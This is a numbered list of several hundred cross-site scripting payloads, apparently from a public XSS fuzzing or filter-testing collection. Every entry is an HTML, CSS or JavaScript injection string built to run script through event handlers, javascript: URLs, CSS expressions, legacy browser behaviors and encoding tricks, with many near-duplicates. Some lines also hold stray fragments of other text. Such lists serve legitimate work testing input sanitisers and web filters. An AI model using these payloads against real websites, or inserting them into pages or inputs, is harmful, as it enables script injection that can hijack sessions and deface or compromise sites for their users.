  444. <body onscroll=javascript:alert(566)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  445. <form id=test onforminput=javascript:alert(567)><input></form><button form=test onformchange=javascript:alert(567)>X
  446. <video><source onerror="javascript:javascript:alert(568)">
  447. <video onerror="javascript:javascript:alert(569)"><source>
  448. <form><button formaction="javascript:javascript:alert(570)">X
  449. <body oninput=javascript:alert(571)><input autofocus>
  450. <math href="javascript:javascript:alert(572)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(572)">CLICKME</maction> </math>
  451. <frameset onload=javascript:alert(573)>
  452. <table background="javascript:javascript:alert(574)">
  453. <!--<img src="--><img src=x onerror=javascript:alert(575)//">
  454. <comment><img src="</comment><img src=x onerror=javascript:alert(576))//">
  455. <![><img src="]><img src=x onerror=javascript:alert(577)//">
  456. <style><img src="</style><img src=x onerror=javascript:alert(578)//">
  457. <li style=list-style:url() onerror=javascript:alert(579)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(579)></div>
  458. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(580)//#">XXX</a></body>
  459. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(581)</SCRIPT>
  460. <OBJECT CLASSID="clsid:333C7BC4-460F-582582D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(582)"></OBJECT>
  461. <b <script>alert(583)</script>0
  462. <div id="div584"><input value="``onmouseover=javascript:alert(584)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div584").innerHTML;</script>
  463. <x '="foo"><x foo='><img src=x onerror=javascript:alert(585)//'>
  464. <embed src="javascript:alert(586)">
  465. <img src="javascript:alert(587)">
  466. <image src="javascript:alert(588)">
  467. <script src="javascript:alert(589)">
  468. <div style=width:590px;filter:glow onfilterchange=javascript:alert(590)>x
  469. <? foo="><script>javascript:alert(591)</script>">
  470. <! foo="><script>javascript:alert(592)</script>">
  471. </ foo="><script>javascript:alert(593)</script>">
  472. <? foo="><x foo='?><script>javascript:alert(594)</script>'>">
  473. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(595)</script>">
  474. <% foo><x foo="%><script>javascript:alert(596)</script>">
  475. <div id=d><x xmlns="><iframe onload=javascript:alert(597)"></div> <script>d.innerHTML=d.innerHTML</script>
  476. <img \x00src=x onerror="alert(598)">
  477. <img \x47src=x onerror="javascript:alert(599)">
  478. <img \x600600src=x onerror="javascript:alert(600)">
  479. <img \x6012src=x onerror="javascript:alert(601)">
  480. <img\x47src=x onerror="javascript:alert(602)">
  481. <img\x6030src=x onerror="javascript:alert(603)">
  482. <img\x6043src=x onerror="javascript:alert(604)">
  483. <img\x32src=x onerror="javascript:alert(605)">
  484. <img\x47src=x onerror="javascript:alert(606)">
  485. <img\x607607src=x onerror="javascript:alert(607)">
  486. <img \x47src=x onerror="javascript:alert(608)">
  487. <img \x34src=x onerror="javascript:alert(609)">
  488. <img \x39src=x onerror="javascript:alert(610)">
  489. <img \x00src=x onerror="javascript:alert(611)">
  490. <img src\x09=x onerror="javascript:alert(612)">
  491. <img src\x6130=x onerror="javascript:alert(613)">
  492. <img src\x6143=x onerror="javascript:alert(614)">
  493. <img src\x32=x onerror="javascript:alert(615)">
  494. <img src\x6162=x onerror="javascript:alert(616)">
  495. <img src\x617617=x onerror="javascript:alert(617)">
  496. <img src\x00=x onerror="javascript:alert(618)">
  497. <img src\x47=x onerror="javascript:alert(619)">
  498. <img src=x\x09onerror="javascript:alert(620)">
  499. <img src=x\x6210onerror="javascript:alert(621)">
  500. <img src=x\x622622onerror="javascript:alert(622)">
  501. <img src=x\x6232onerror="javascript:alert(623)">
  502. <img src=x\x6243onerror="javascript:alert(624)">
  503. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(625)">
  504. <img src=x onerror=\x09"javascript:alert(626)">
  505. <img src=x onerror=\x6270"javascript:alert(627)">
  506. <img src=x onerror=\x628628"javascript:alert(628)">
  507. <img src=x onerror=\x6292"javascript:alert(629)">
  508. <img src=x onerror=\x32"javascript:alert(630)">
  509. <img src=x onerror=\x00"javascript:alert(631)">
  510. <a href=java&#632&#2&#3&#4&#5&#6&#7&#8&#632632&#6322script:javascript:alert(632)>XXX</a>
  511. <img src="x` `<script>javascript:alert(633)</script>"` `>
  512. <img src onerror /" '"= alt=javascript:alert(634)//">
  513. <title onpropertychange=javascript:alert(635)></title><title title=>
  514. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(636)></a>">
  515. <!--[if]><script>javascript:alert(637)</script -->
  516. <!--[if<img src=x onerror=javascript:alert(638)//]> -->
  517. <object id="x" classid="clsid:CB927D6392-4FF7-4a9e-A63969-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C6397-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(639)" style="behavior:url(#x);"><param name=postdomevents /></object>
  518. <a style="-o-link:'javascript:javascript:alert(640)';-o-link-source:current">X
  519. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(641)'}{}*{-o-link-source:current}]{color:red};</style>
  520. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(642))%7d
  521. <style>@import "data:,*%7bx:expression(javascript:alert(643))%7D";</style>
  522. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(644);">XXX</a></a><a href="javascript:javascript:alert(644)">XXX</a>
  523. <// style=x:expression\28javascript:alert(645)\29>
  524. <style>*{x:expression(javascript:alert(646))}</style>
  525. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(647));">X
  526. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(648)}}).$=eval</script>
  527. <script>({0:#0=eval/#0#/#0#(javascript:alert(649))})</script>
  528. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(650)}),x</script>
  529. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(651)')()</script>
  530. <meta charset="mac-farsi">¼script¾javascript:alert(652)¼/script¾
  531. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(653)` >
  532. 654<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x4654vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(654)&gt;`>
  533. 655<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(655)&gt;>
  534. 656<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(656) strokecolor=white strokeweight=656000px from=0 to=656000 /></a>
  535. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(657)">XXX</a>
  536. <event-source src="%(event)s" onload="javascript:alert(658)">
  537. <a href="javascript:javascript:alert(659)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  538. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#660660;src=x:x&#660660;onerror&#660660;=javascript:alert(660)&gt;">
  539. <script>javascript:alert(661)</script>
  540. <IMG SRC="javascript:javascript:alert(662);">
  541. <IMG SRC=javascript:javascript:alert(663)>
  542. <IMG SRC=`javascript:javascript:alert(664)`>
  543. <FRAMESET><FRAME SRC="javascript:javascript:alert(665);"></FRAMESET>
  544. <BODY ONLOAD=javascript:alert(666)>
  545. <BODY ONLOAD=javascript:javascript:alert(667)>
  546. <IMG SRC="jav ascript:javascript:alert(668);">
  547. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(669)>
  548. <IMG SRC="javascript:javascript:alert(670)"
  549. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(671);">
  550. <IMG DYNSRC="javascript:javascript:alert(672)">
  551. <IMG LOWSRC="javascript:javascript:alert(673)">
  552. <BGSOUND SRC="javascript:javascript:alert(674);">
  553. <BR SIZE="&{javascript:alert(675)}">
  554. <LINK REL="stylesheet" HREF="javascript:javascript:alert(676);">
  555. <STYLE>li {list-style-image: url("javascript:javascript:alert(677)");}</STYLE><UL><LI>XSS
  556. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(678);">
  557. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(679);">
  558. <IFRAME SRC="javascript:javascript:alert(680);"></IFRAME>
  559. <TABLE BACKGROUND="javascript:javascript:alert(681)">
  560. <TABLE><TD BACKGROUND="javascript:javascript:alert(682)">
  561. <DIV STYLE="background-image: url(javascript:javascript:alert(683))">
  562. <DIV STYLE="width:expression(javascript:alert(684));">
  563. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(685))">
  564. <XSS STYLE="xss:expression(javascript:alert(686))">
  565. <STYLE TYPE="text/javascript">javascript:alert(687);</STYLE>
  566. <STYLE>.XSS{background-image:url("javascript:javascript:alert(688)");}</STYLE><A CLASS=XSS></A>
  567. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(689)")}</STYLE>
  568. <!--[if gte IE 4]><SCRIPT>javascript:alert(690);</SCRIPT><![endif]-->
  569. <BASE HREF="javascript:javascript:alert(691);//">
  570. <OBJECT classid=clsid:ae24fdae-03c6-692692d692-8b76-0080c744f389><param name=url value=javascript:javascript:alert(692)></OBJECT>
  571. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(693)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  572. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(694)&lt;/SCRIPT&gt;"></BODY></HTML>
  573. <form id="test" /><button form="test" formaction="javascript:javascript:alert(695)">X
  574. <body onscroll=javascript:alert(696)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  575. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(697)">
  576. <STYLE>a{background:url('s698' 's2)}@import javascript:javascript:alert(698);');}</STYLE>
  577. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(699)&&;&&<&&/script&&>
  578. <SCRIPT onreadystatechange=javascript:javascript:alert(700);></SCRIPT>
  579. <style onreadystatechange=javascript:javascript:alert(701);></style>
  580. <?xml version="702.0"?><html:html xmlns:html='http://www.w3.org/702999/xhtml'><html:script>javascript:alert(702);</html:script></html:html>
  581. <embed code=javascript:javascript:alert(703);></embed>
  582. <frameset onload=javascript:javascript:alert(704)></frameset>
  583. <object onerror=javascript:javascript:alert(705)>
  584. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(706);">]]</C><X></xml>
  585. <IMG SRC=&{javascript:alert(707);};>
  586. <a href="jav&#65ascript:javascript:alert(708)">test708</a>
  587. <a href="jav&#97ascript:javascript:alert(709)">test709</a>
  588. <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(710)&amp;gt;>">
  589. ';alert(711))//';alert(711))//";
  590. alert(712))//";alert(712))//--
  591. ></SCRIPT>">'><SCRIPT>alert(713))</SCRIPT>
  592. <IMG SRC="javascript:alert(714);">
  593. <IMG SRC=javascript:alert(715)>
  594. <IMG SRC=JaVaScRiPt:alert(716)>
  595. <IMG SRC=javascript:alert(717)>
  596. <IMG SRC=`javascript:alert(718)`>
  597. <a onmouseover="alert(719)">xxs link</a>
  598. <a onmouseover=alert(720)>xxs link</a>
  599. <IMG """><SCRIPT>alert(721)</SCRIPT>">
  600. <IMG SRC=javascript:alert(722))>
  601. <IMG SRC=# onmouseover="alert(723)">
  602. <IMG SRC= onmouseover="alert(724)">
  603. <IMG onmouseover="alert(725)">
  604. <IMG SRC="jav ascript:alert(726);">
  605. <IMG SRC="jav&#x09;ascript:alert(727);">
  606. <IMG SRC="jav&#x0A;ascript:alert(728);">
  607. <IMG SRC="jav&#x0D;ascript:alert(729);">
  608. perl -e 'print "<IMG SRC=java\0script:alert(730)>";' > out
  609. <IMG SRC=" &#14; javascript:alert(731);">
  610. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(732)>
  611. <<SCRIPT>alert(733);//<</SCRIPT>
  612. <IMG SRC="javascript:alert(734)"
  613. \";alert(735);//
  614. </TITLE><SCRIPT>alert(736);</SCRIPT>
  615. <INPUT TYPE="IMAGE" SRC="javascript:alert(737);">
  616. <BODY BACKGROUND="javascript:alert(738)">
  617. <IMG DYNSRC="javascript:alert(739)">
  618. <IMG LOWSRC="javascript:alert(740)">
  619. <STYLE>li {list-style-image: url("javascript:alert(741)");}</STYLE><UL><LI>XSS</br>
  620. <BODY ONLOAD=alert(742)>
  621. <BGSOUND SRC="javascript:alert(743);">
  622. <BR SIZE="&{alert(744)}">
  623. <LINK REL="stylesheet" HREF="javascript:alert(745);">
  624. <STYLE>@im\port'\ja\vasc\ript:alert(746)';</STYLE>
  625. <IMG STYLE="xss:expr/*XSS*/ession(alert(747))">
  626. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(748))'>
  627. <STYLE TYPE="text/javascript">alert(749);</STYLE>
  628. <STYLE>.XSS{background-image:url("javascript:alert(750)");}</STYLE><A CLASS=XSS></A>
  629. <STYLE type="text/css">BODY{background:url("javascript:alert(751)")}</STYLE>
  630. <STYLE type="text/css">BODY{background:url("javascript:alert(752)")}</STYLE>
  631. <XSS STYLE="xss:expression(alert(753))">
  632. ¼script¾alert(754)¼/script¾
  633. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(755);">
  634. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(756);">
  635. <IFRAME SRC="javascript:alert(757);"></IFRAME>
  636. <IFRAME SRC=# onmouseover="alert(758)"></IFRAME>
  637. <FRAMESET><FRAME SRC="javascript:alert(759);"></FRAMESET>
  638. <TABLE BACKGROUND="javascript:alert(760)">
  639. <TABLE><TD BACKGROUND="javascript:alert(761)">
  640. <DIV STYLE="background-image: url(javascript:alert(762))">
  641. <DIV STYLE="background-image: url(&#1;javascript:alert(763))">
  642. <DIV STYLE="width: expression(alert(764));">
  643. <BASE HREF="javascript:alert(765);//">
  644. <? echo('<SCR)';echo('IPT>alert(766)</SCRIPT>'); ?>
  645. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(767)</SCRIPT>">
  646. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(768);+ADw-/SCRIPT+AD4-
  647. <img src=`%00`&NewLine; onerror=alert(769)&NewLine;
  648. <script /*%00*/>/*%00*/alert(770)/*%00*/</script /*%00*/
  649. <iframe/src="data:text/html,<svg &#771771771;&#7717710;load=alert(771)>">
  650. <meta content="&NewLine; 772 &NewLine;; JAVASCRIPT&colon; alert(772)" http-equiv="refresh"/>
  651. <form><iframe &#09;&#7730;&#773773; src="javascript&#58;alert(773)"&#773773;&#7730;&#09;;>
  652. http://www.google<script .com>alert(774)</script
  653. <script ^__^>alert(775))</script ^__^
  654. </style &#32;><script &#32; :-(>/**/alert(776)/**/</script &#32; :-(
  655. &#00;</form><input type&#6777;"date" onfocus="alert(777)">
  656. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(778)&NewLine;>X</a>
  657. <script ~~~>alert(779)</script ~~~>
  658. <iframe/%00/ src=javaSCRIPT&colon;alert(780)
  659. <%<!--'%><script>alert(781);</script -->
  660. <script src="data:text/javascript,alert(782)"></script>
  661. <iframe/onreadystatechange=alert(783)
  662. <svg/onload=alert(784)
  663. <input type="text" value=`` <div/onmouseover='alert(785)'>X</div>
  664. http://www.<script>alert(786)</script .com
  665. <svg><script ?>alert(787)
  666. <img src=`xx:xx`onerror=alert(788)>
  667. <meta http-equiv="refresh" content="0;javascript&colon;alert(789)"/>
  668. <script>+-+-790-+-+alert(790)</script>
  669. <body/onload=&lt;!--&gt;&#7910alert(791)>
  670. <script itworksinallbrowsers>/*<script* */alert(792)</script
  671. <img src ?itworksonchrome?\/onerror = alert(793)
  672. <svg><script onlypossibleinopera:-)> alert(794)
  673. <script x> alert(795) </script 795=2
  674. <div/onmouseover='alert(796)'> style="x:">
  675. <--`<img/src=` onerror=alert(797)> --!>
  676. <div style="position:absolute;top:0;left:0;width:79800%;height:79800%" onmouseover="prompt(798)" onclick="alert(798)">x</button>
  677. <form><button formaction=javascript&colon;alert(799)>CLICKME
  678. ‘; alert(800);
  679. ‘)alert(801);//
  680. <ScRiPt>alert(802)</sCriPt>
  681. <IMG SRC=jAVasCrIPt:alert(803)>
  682. <IMG SRC=”javascript:alert(804);”>
  683. <IMG SRC=javascript:alert(805)>
  684. <IMG SRC=javascript:alert(806)>
  685. <img src=xss onerror=alert(807)>
  686. <img src=`%00`&NewLine; onerror=alert(808)&NewLine;
  687. <script /*%00*/>/*%00*/alert(809)/*%00*/</script /*%00*/
  688. <iframe/src="data:text/html,<svg &#810810810;&#8108100;load=alert(810)>">
  689. <meta content="&NewLine; 811 &NewLine;; JAVASCRIPT&colon; alert(811)" http-equiv="refresh"/>
  690. <form><iframe &#09;&#8120;&#812812; src="javascript&#58;alert(812)"&#812812;&#8120;&#09;;>
  691. http://www.google<script .com>alert(813)</script
  692. <script ^__^>alert(814))</script ^__^
  693. </style &#32;><script &#32; :-(>/**/alert(815)/**/</script &#32; :-(
  694. &#00;</form><input type&#6816;"date" onfocus="alert(816)">
  695. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(817)&NewLine;>X</a>
  696. <script ~~~>alert(818)</script ~~~>
  697. <iframe/%00/ src=javaSCRIPT&colon;alert(819)
  698. <%<!--'%><script>alert(820);</script -->
  699. <script src="data:text/javascript,alert(821)"></script>
  700. <iframe/onreadystatechange=alert(822)
  701. <svg/onload=alert(823)
  702. <input type="text" value=`` <div/onmouseover='alert(824)'>X</div>
  703. http://www.<script>alert(825)</script .com
  704. <svg><script ?>alert(826)
  705. <img src=`xx:xx`onerror=alert(827)>
  706. <meta http-equiv="refresh" content="0;javascript&colon;alert(828)"/>
  707. <script>+-+-829-+-+alert(829)</script>
  708. <body/onload=&lt;!--&gt;&#8300alert(830)>
  709. <script itworksinallbrowsers>/*<script* */alert(831)</script
  710. <img src ?itworksonchrome?\/onerror = alert(832)
  711. <svg><script onlypossibleinopera:-)> alert(833)
  712. <script x> alert(834) </script 834=2
  713. <div/onmouseover='alert(835)'> style="x:">
  714. <--`<img/src=` onerror=alert(836)> --!>
  715. <div style="xg-p:absolute;top:0;left:0;width:83700%;height:83700%" onmouseover="prompt(837)" onclick="alert(837)">x</button>
  716. <form><button formaction=javascript&colon;alert(838)>CLICKME
  717. ‘;alert(839))//’;alert(839))//”;alert(839))//”;alert(839))//–></SCRIPT>”>’><SCRIPT>alert(839))</SCRIPT>
  718. <IMG “””><SCRIPT>alert(840)</SCRIPT>”>
  719. <IMG SRC=javascript:alert(841))>
  720. <IMG SRC=”jav ascript:alert(842);”>
  721. <IMG SRC=”jav&#x09;ascript:alert(843);”>
  722. <<SCRIPT>alert(844);//<</SCRIPT>
  723. %253cscript%253ealert(845)%253c/script%253e
  724. “><s”%2b”cript>alert(846)</script>
  725. foo<script>alert(847)</script>
  726. <scr<script>ipt>alert(848)</scr</script>ipt>
  727. <BODY BACKGROUND=”javascript:alert(849)”>
  728. <BODY ONLOAD=alert(850)>
  729. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(851);”>
  730. <IMG SRC=”javascript:alert(852)”
  731. javascript:alert(853)
  732. <img src="javascript:alert(854);">
  733. <img src=javascript:alert(855)>
  734. <"';alert(856))//\';alert(856))//";alert(856))//\";alert(856))//--></SCRIPT>">'><SCRIPT>alert(856))</SCRIPT>
  735. <IFRAME SRC="javascript:alert(857);"></IFRAME>
  736. <<SCRIPT>alert(858);//<</SCRIPT>
  737. <"';alert(859))//\';alert(859))//";alert(859))//\";alert(859))//--></SCRIPT>">'><SCRIPT>alert(859))</SCRIPT>
  738. ';alert(860))//\';alert(860))//";alert(860))//\";alert(860))//--></SCRIPT>">'><SCRIPT>alert(860))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  739. <script>alert(861)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  740. <script>alert(862);</script>&search=1
  741. 0&q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  742. <BODY ONLOAD=alert(864)>
  743. <body onscroll=alert(865)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  744. <form><button formaction="javascript:alert(866)">lol
  745. <!--<img src="--><img src=x onerror=alert(867)//">
  746. <![><img src="]><img src=x onerror=alert(868)//">
  747. <style><img src="</style><img src=x onerror=alert(869)//">
  748. <? foo="><script>alert(870)</script>">
  749. <! foo="><script>alert(871)</script>">
  750. </ foo="><script>alert(872)</script>">
  751. <? foo="><x foo='?><script>alert(873)</script>'>">
  752. <! foo="[[[Inception]]"><x foo="]foo><script>alert(874)</script>">
  753. <% foo><x foo="%><script>alert(875)</script>">
  754. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(876)</script></svg>
  755. &lt;SCRIPT&gt;alert(877)&lt;/SCRIPT&gt;
  756. \\";alert(878);//
  757. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(879);&lt;/SCRIPT&gt;
  758. &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert(880);\"&gt;
  759. &lt;BODY BACKGROUND=\"javascript&#058;alert(881)\"&gt;
  760. &lt;BODY ONLOAD=alert(882)&gt;
  761. &lt;IMG DYNSRC=\"javascript&#058;alert(883)\"&gt;
  762. &lt;IMG LOWSRC=\"javascript&#058;alert(884)\"&gt;
  763. &lt;BGSOUND SRC=\"javascript&#058;alert(885);\"&gt;
  764. &lt;BR SIZE=\"&{alert(886)}\"&gt;
  765. &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert(887);\"&gt;
  766. &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert(888)\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  767. žscriptualert(889)ž/scriptu
  768. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert(890);\"&gt;
  769. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert(891);\"
  770. &lt;IFRAME SRC=\"javascript&#058;alert(892);\"&gt;&lt;/IFRAME&gt;
  771. &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert(893);\"&gt;&lt;/FRAMESET&gt;
  772. &lt;TABLE BACKGROUND=\"javascript&#058;alert(894)\"&gt;
  773. &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert(895)\"&gt;
  774. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert(896))\"&gt;
  775. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert(897))\"&gt;
  776. &lt;DIV STYLE=\"width&#58; expression(alert(898));\"&gt;
  777. &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(899)';&lt;/STYLE&gt;
  778. &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert(900))\"&gt;
  779. &lt;XSS STYLE=\"xss&#58;expression(alert(901))\"&gt;
  780. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(902))'&gt;
  781. &lt;STYLE TYPE=\"text/javascript\"&gt;alert(903);&lt;/STYLE&gt;
  782. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert(904)\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  783. &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert(905)\")}&lt;/STYLE&gt;
  784. &lt;SCRIPT&gt;alert(906);&lt;/SCRIPT&gt;
  785. &lt;BASE HREF=\"javascript&#058;alert(907);//\"&gt;
  786. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(908)&gt;&lt;/OBJECT&gt;
  787. d=\"alert(909);\\")\";
  788. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(910);\"&gt;&#93;&#93;&gt;
  789. &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert(911)\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  790. &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(912)&lt;/SCRIPT&gt;\"&gt;
  791. echo('IPT&gt;alert(913)&lt;/SCRIPT&gt;'); ?&gt;
  792. &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert(914)&lt;/SCRIPT&gt;\"&gt;
  793. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(915);+ADw-/SCRIPT+AD4-
  794. &lt;IMG SRC=\"javascript&#058;alert(916)\"
  795. &lt;&lt;SCRIPT&gt;alert(917);//&lt;&lt;/SCRIPT&gt;
  796. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(918)&gt;
  797. &lt;IMG SRC=\" javascript&#058;alert(919);\"&gt;
  798. perl -e 'print \"&lt;SCR\0IPT&gt;alert(920)&lt;/SCR\0IPT&gt;\";' &gt; out
  799. perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(921)&gt;\";' &gt; out
  800. &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert(922);\"&gt;
  801. &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert(923);\"&gt;
  802. &lt;IMG SRC=\"jav&#x09;ascript&#058;alert(924);\"&gt;
  803. &lt;IMG SRC=javascript&#058;alert(925)&gt;
  804. &lt;IMG SRC=javascript&#058;alert(926))&gt;
  805. &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(927)&lt;/SCRIPT&gt;\"&gt;
  806. &lt;IMG SRC=`javascript&#058;alert(928)`&gt;
  807. &lt;IMG SRC=javascript&#058;alert(929)&gt;
  808. &lt;IMG SRC=JaVaScRiPt&#058;alert(930)&gt;
  809. &lt;IMG SRC=javascript&#058;alert(931)&gt;
  810. &lt;IMG SRC=\"javascript&#058;alert(932);\"&gt;
  811. ';alert(933))//\';alert(933))//\";alert(933))//\\";alert(933))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(933))&lt;/SCRIPT&gt;
  812. ';alert(934))//\';alert(934))//";alert(934))//\";alert(934))//--></SCRIPT>">'><SCRIPT>alert(934))</SCRIPT>
  813. <IMG SRC="javascript:alert(935);">
  814. <IMG SRC=javascript:alert(936)>
  815. <IMG SRC=javascrscriptipt:alert(937)>
  816. <IMG SRC=JaVaScRiPt:alert(938)>
  817. <IMG """><SCRIPT>alert(939)</SCRIPT>">
  818. <IMG SRC=" &#14; javascript:alert(940);">
  819. <<SCRIPT>alert(941);//<</SCRIPT>
  820. <SCRIPT>a=/XSS/alert(942)</SCRIPT>
  821. \";alert(943);//
  822. </TITLE><SCRIPT>alert(944);</SCRIPT>
  823. ¼script¾alert(945)¼/script¾
  824. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(946);">
  825. <IFRAME SRC="javascript:alert(947);"></IFRAME>
  826. <FRAMESET><FRAME SRC="javascript:alert(948);"></FRAMESET>
  827. <TABLE BACKGROUND="javascript:alert(949)">
  828. <TABLE><TD BACKGROUND="javascript:alert(950)">
  829. <DIV STYLE="background-image: url(javascript:alert(951))">
  830. <DIV STYLE="width: expression(alert(952));">
  831. <STYLE>@im\port'\ja\vasc\ript:alert(953)';</STYLE>
  832. <IMG STYLE="xss:expr/*XSS*/ession(alert(954))">
  833. <XSS STYLE="xss:expression(alert(955))">
  834. exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(956))'>
  835. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(957)&lt;/SCRIPT&gt;"></BODY></HTML>
  836. <form id="test" /><button form="test" formaction="javascript:alert(958)">TESTHTML5FORMACTION
  837. <form><button formaction="javascript:alert(959)">crosssitespt
  838. <frameset onload=alert(960)>
  839. <!--<img src="--><img src=x onerror=alert(961)//">
